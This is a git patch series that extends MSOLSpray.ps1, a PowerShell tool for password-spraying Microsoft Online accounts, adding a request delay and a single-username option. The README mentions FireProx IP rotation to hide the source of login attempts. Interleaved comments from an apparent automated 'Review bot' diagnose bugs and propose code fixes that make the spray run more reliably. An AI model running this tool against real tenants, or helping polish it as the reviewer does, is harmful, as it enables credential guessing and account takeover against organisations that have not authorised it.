From 0a6570968cd0450fc7531b093520ecc5fa1e9030 Mon Sep 17 00:00:00 2001 From: Steve Borosh Date: Fri, 18 Feb 2022 20:33:22 -0500 Subject: [PATCH 1/4] Update MSOLSpray.ps1 Added delay option --- MSOLSpray.ps1 | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/MSOLSpray.ps1 b/MSOLSpray.ps1 index 3327392..9c2afc4 100644 --- a/MSOLSpray.ps1 +++ b/MSOLSpray.ps1 @@ -1,4 +1,4 @@ -function Invoke-MSOLSpray{ +function Invoke-MSOLSpray{ <# .SYNOPSIS @@ -21,6 +21,10 @@ A single password that will be used to perform the password spray. + .PARAMETER Delay + + A number in seconds to delay between requests. + .PARAMETER OutFile A file to output valid results to. @@ -62,6 +66,10 @@ [string] $Password = "", + [Parameter(Position = 2, Mandatory = $False)] + [Int] + $Delay = 10, + # Change the URL if you are using something like FireProx [Parameter(Position = 3, Mandatory = $False)] [string] @@ -94,6 +102,9 @@ # Setting up the web request $BodyParams = @{'resource' = 'https://graph.windows.net'; 'client_id' = '1b730954-1685-4b74-9bfd-dac224a7b894' ; 'client_info' = '1' ; 'grant_type' = 'password' ; 'username' = $username ; 'password' = $password ; 'scope' = 'openid'} $PostHeaders = @{'Accept' = 'application/json'; 'Content-Type' = 'application/x-www-form-urlencoded'} + if ($Delay) { + Start-Sleep -Seconds $Delay + } $webrequest = Invoke-WebRequest $URL/common/oauth2/token -Method Post -Headers $PostHeaders -Body $BodyParams -ErrorVariable RespErr # If we get a 200 response code it's a valid cred @@ -202,4 +213,4 @@ Write-Output "Results have been written to $OutFile." } } -} \ No newline at end of file +} From eaf5c494d8e5021e0d3a863f00b963108c60e100 Mon Sep 17 00:00:00 2001 From: Steve Borosh Date: Fri, 18 Feb 2022 20:46:11 -0500 Subject: [PATCH 2/4] Update MSOLSpray.ps1 Added delay and single username --- MSOLSpray.ps1 | 21 +++++++++++++++++---- 1 file changed, 17 insertions(+), 4 deletions(-) 
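Review bot: `$Delay` is declared as a bare `[Int]` in the `@@ -62,6 +66,10 @@` hunk of PATCH 1/4, so a negative value passes the `if ($Delay)` guard added in the `@@ -94,6 +102,9 @@` hunk and reaches `Start-Sleep -Seconds`, which rejects negative values. Because the function sets `$ErrorActionPreference= 'silentlycontinue'` (visible as context in PATCH 2/4), that failure is likely to go unreported and the loop would run with no pause at all. Validating at the parameter surfaces the mistake at call time, for example `[ValidateRange(0, 86400)]` above `[Int]` (the upper bound is only a suggestion). The same declaration also reuses `Position = 2`, which the context in PATCH 2/4 shows is already held by another parameter; PATCH 2/4 then moves `$Delay` to 4. The `param` block starts and ends outside the hunk.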
diff --git a/MSOLSpray.ps1 b/MSOLSpray.ps1 index 9c2afc4..6264a86 100644 --- a/MSOLSpray.ps1 +++ b/MSOLSpray.ps1 @@ -17,6 +17,10 @@ function Invoke-MSOLSpray{ UserList file filled with usernames one-per-line in the format "user@domain.com" + .PARAMETER UserName + + A single user to spray in the format "user@domain.com". + .PARAMETER Password A single password that will be used to perform the password spray. @@ -39,10 +43,10 @@ function Invoke-MSOLSpray{ .EXAMPLE - C:\PS> Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 + C:\PS> Invoke-MSOLSpray -UserName user@company.com -Password Winter2020 Description ----------- - This command will use the provided userlist and attempt to authenticate to each account with a password of Winter2020. + This command will use the provided username and attempt to authenticate to with a password of Winter2020. .EXAMPLE @@ -64,9 +68,13 @@ function Invoke-MSOLSpray{ [Parameter(Position = 2, Mandatory = $False)] [string] + $UserName = "", + + [Parameter(Position = 3, Mandatory = $False)] + [string] $Password = "", - [Parameter(Position = 2, Mandatory = $False)] + [Parameter(Position = 4, Mandatory = $False)] [Int] $Delay = 10, @@ -81,7 +89,12 @@ function Invoke-MSOLSpray{ ) $ErrorActionPreference= 'silentlycontinue' - $Usernames = Get-Content $UserList + + if ($UserName -ne "") { + $Usernames = $UserName + } else { + $Usernames = Get-Content $UserList + } $count = $Usernames.count $curr_user = 0 $lockout_count = 0 From 834dfda5f1874b703a44b352f4f67b56c7a5edd5 Mon Sep 17 00:00:00 2001 From: Steve Borosh Date: Fri, 18 Feb 2022 20:48:29 -0500 Subject: [PATCH 3/4] Update README.md Updated options --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index aa7be2f..4526b05 100644 --- a/README.md +++ b/README.md 
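Review bot: The rewritten description in the `@@ -39,10 +43,10 @@` hunk reads "attempt to authenticate to with a password", which lost its object when "each account" was removed. Suggested wording: `This command will use the provided username and attempt to authenticate to that account with a password of Winter2020.` The comment-based help block continues outside the hunk.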
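Review bot: After the renumbering in the `@@ -64,9 +68,13 @@` hunk, `$Password` takes `Position = 3`, but the URL parameter still carries `Position = 3` in the unchanged context shown in PATCH 4/4, so two parameters share a position. Positional binding for that argument is then ambiguous, and a call may fail or bind to a parameter the caller did not intend. Either renumber every later parameter, or drop `Position` from the optional ones so they must be named, e.g. `[Parameter(Mandatory = $False)]` on `$Delay` and the URL parameter. The `param` block starts and ends outside the hunk, so the remaining positions should be checked as well.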
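Review bot: The new branch in the `@@ -81,7 +89,12 @@` hunk does not handle the case where neither `-UserName` nor `-UserList` is supplied, and when both are supplied the list is ignored without notice. With `$ErrorActionPreference= 'silentlycontinue'` set on the line above, a `Get-Content` failure on a missing or empty `$UserList` is likely hidden, and the function carries on with no usernames. An explicit guard before the branch would make this visible: `if (-not $UserName -and -not $UserList) { Write-Warning 'Specify -UserName or -UserList'; return }`. Wrapping the scalar as `$Usernames = @($UserName)` would also give `$Usernames.count` and the later enumeration an array in both branches. The function body continues outside the hunk.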
@@ -25,8 +25,10 @@ Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020 ### Invoke-MSOLSpray Options ``` UserList - UserList file filled with usernames one-per-line in the format "user@domain.com" +UserName - Single username to spray in the format "user@domain.com" Password - A single password that will be used to perform the password spray. OutFile - A file to output valid results to. Force - Forces the spray to continue and not stop when multiple account lockouts are detected. URL - The URL to spray against. Potentially useful if pointing at an API Gateway URL generated with something like FireProx to randomize the IP address you are authenticating from. +Delay - A delay between attempts in seconds. ``` From 99a52a00d96e0ef689a66bc611cb8c68140c5cb0 Mon Sep 17 00:00:00 2001 From: Steve Borosh Date: Fri, 18 Feb 2022 20:53:12 -0500 Subject: [PATCH 4/4] Update MSOLSpray.ps1 --- MSOLSpray.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/MSOLSpray.ps1 b/MSOLSpray.ps1 index 6264a86..70d473a 100644 --- a/MSOLSpray.ps1 +++ b/MSOLSpray.ps1 @@ -76,7 +76,7 @@ function Invoke-MSOLSpray{ [Parameter(Position = 4, Mandatory = $False)] [Int] - $Delay = 10, + $Delay = 0, # Change the URL if you are using something like FireProx [Parameter(Position = 3, Mandatory = $False)]
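Review bot: The default changed in the `@@ -76,7 +76,7 @@` hunk of PATCH 4/4 is not documented: neither the `.PARAMETER Delay` help added in PATCH 1/4 nor the README line added in PATCH 3/4 states a default. With `$Delay = 0` the `if ($Delay)` guard is false, so no pause happens unless the caller passes `-Delay`. The help text could say so, e.g. `A number in seconds to delay between requests. Default is 0 (no delay).` The `param` block starts and ends outside the hunk.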